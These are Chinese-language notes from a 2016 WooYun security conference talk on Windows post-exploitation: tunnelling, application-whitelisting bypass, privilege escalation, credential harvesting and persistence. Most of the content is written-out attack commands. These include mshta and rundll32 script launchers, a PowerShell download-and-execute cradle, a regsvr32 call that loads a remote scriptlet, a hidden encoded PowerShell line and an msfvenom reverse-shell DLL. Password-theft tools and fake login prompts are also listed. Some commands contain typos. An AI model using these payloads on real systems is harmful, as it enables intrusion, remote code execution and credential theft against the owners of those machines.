后渗透阶段常用技术总结 wooyun whitehatfest 2016

小结

后渗透主要行为

  • Proxy
  • Bypass Application Whitelisting
  • Escalate Privileges
  • Information Gathering
  • Persistence
  • Detection and Mitigations

Proxy

端口转发 Client -> lcx, Netsh; HTTP->Tunnel; Metasploit->Portpwd

Socks代理 Client->Ew,Xsocks; HTTP->ReGeorg; Metasploit-> Socks4a

其他 SSH ICMP
VPN

Bypass Application Whitelisting

绕过思路

  • HTA
  • Office Macro
  • Cpl
  • Chm
  • Powershell
  • Rundll32
  • Regsvr32
  • Regsvcs
  • Installutil

HTA

vbscript

1
mshta.exe vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

javascript

1
mshta,exe javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActivaXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScriptShell").Run("cmd /c taskkill /f /im mshta",0,true);}

Office Macro

MacroRaptor
https://bitbucket.org/decalage/oletools/wiki/mraptor

DLL/CPL

生成
payload.dll:
msfvenom -p windows/meterpreter/reverse_tcp -b ‘\x00\xff’ lhost=192.168.127.132 lport=8888 -f dll -o payload.dll

http://drops.wooyun.org/tips/16042

(1) 直接运行dll: rundll32 shell32.dll,Control_RunDLL payload.dll
(2) 将dll重命名成cpl,双击运行
(3) 普通的dll直接改后缀名

Chm

高级组合技巧打造完美捆绑后门
http://drops.wooyun.org/tips/14254

利用系统 CHM 实现隐蔽后门:
《那些年我们玩过的奇技淫巧》

Powershell

Command

1
2
3
powershell -nop -exec bypass -c IEX(New-Object.WebClient).DownloadString("http://ip:port")
Get-Content payload.ps1 | iex
cmd.exe /K <payload.bat>

Lnk

1
powershell -nop -windows -hidden -E YwBhAGwAYwAuAGUAeABIAA==

如果禁用powershell

Rundll32

JavaScript

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();new%20ActiveObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://ip.port');")

DLL

1
rundll32 shell32.dll,Control_RunDLL payload.dll

http://drops.wooyun.org/tips/11764

Regsvr32

三种启动方式

regsvr32 /u /n /s /i:padload.sct scrobj.dll

regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

右键注册

http://subt0x10.blogspot.jp/2016/04/bypass-application-whitelisting-script.html

http://drops.wooyun.org/tips/15124

Regsvcs

https://gist.github.com/subTee/e1c54e1fdafc15674c9a

Installutil

编译

1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe/platform:x64/out:InstallUtil.exe InstallUtil.cs

InstallUtil.exe /U InstallUtil.exe

http://subt0x10.blogspot.jp/2015/08/application-whitelisting-bypasses-101.html

http://drops.wooyun.org/tips/8862

可执行目录

通过ps 脚本扫描可写入的路径

http://go.mssec.se/AppLockerBC

Escalation

常见提权方式

  • 本地提权漏洞
  • 服务提权
  • 协议
  • phishing

本地提权

根据补丁号来确定是否存在漏洞的脚本
https://github.com/GDSSecurity/Windows-Exploit-Suggester
将victim计算机的systeminfo导出到文件
Systeminfo>1.txt
使用脚本判断存在的漏洞
python windows/exploit-suggester.py –database 2016-05-31mssb.xls –systeminfo ~/Desktop/1.txt

可能遇到exp被杀的问题

将exp改成powershell

http://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html

服务提权

常用服务: mssql,mysql,oracle,ftp
第三方服务: dll hijacking, file hijacking

提权脚本powerup
https://drops.wooyun.org/tips/11989

协议提权

利用已知的windows问题,以获得本地权限提升 -> Potato
其利用NTLM中继(特别时基于HTTP > SMB中继)和 NBNS 欺骗进行提权

http://tools.pwn.ren/2016/01/17/patato-windows.html

phishing

msf ask 模块

exploit/windows/local/ask

通过runas方式来诱导用户通过点击uac验证来获取最高权限

需要修改的msf脚本
metasploit/lib/msf/core/post/windows/runas.rb

Information Gathering

LaZagne
mstsc记录
浏览器历史记录
本机用户密码
本机 WiFi ssid 以及 WiFi密码
本机最近操作文件
本机System info
证书!
Installed Programs: Startup Items
Installed Services: Security Services File/Printer Shares DatabaseServers Cerificate Authority
Sensitive Data: Key-logging Screen capture Network traffic
User Information
System Configuration: Password Policy Security Policies Configured Wireless Network and keys

键盘记录
屏幕录像
Netripper

phishing密码
通过脚本弹出认证窗口
https://github.com/Ridter/Pentest/blob/master/note/Powershell_MSFCapture.md

msf模块
post/windows/gather/phish_windows_credentials

Bypass UAC

无文件攻击

powershell

jsrat

mshta

sct

wsc

Persistence

  • 启动项
  • 注册表
  • wmi
  • at
  • schtasks
  • 劫持已有的第三方服务
  • bitsadmin

Detection

bitsadmin /list /allusers /verbose

Stop Background Intelligent Transfer Service

参考资料

乌云白帽大会 2016 ShellIsOnlyTheBeginning 3gstudent evi1cg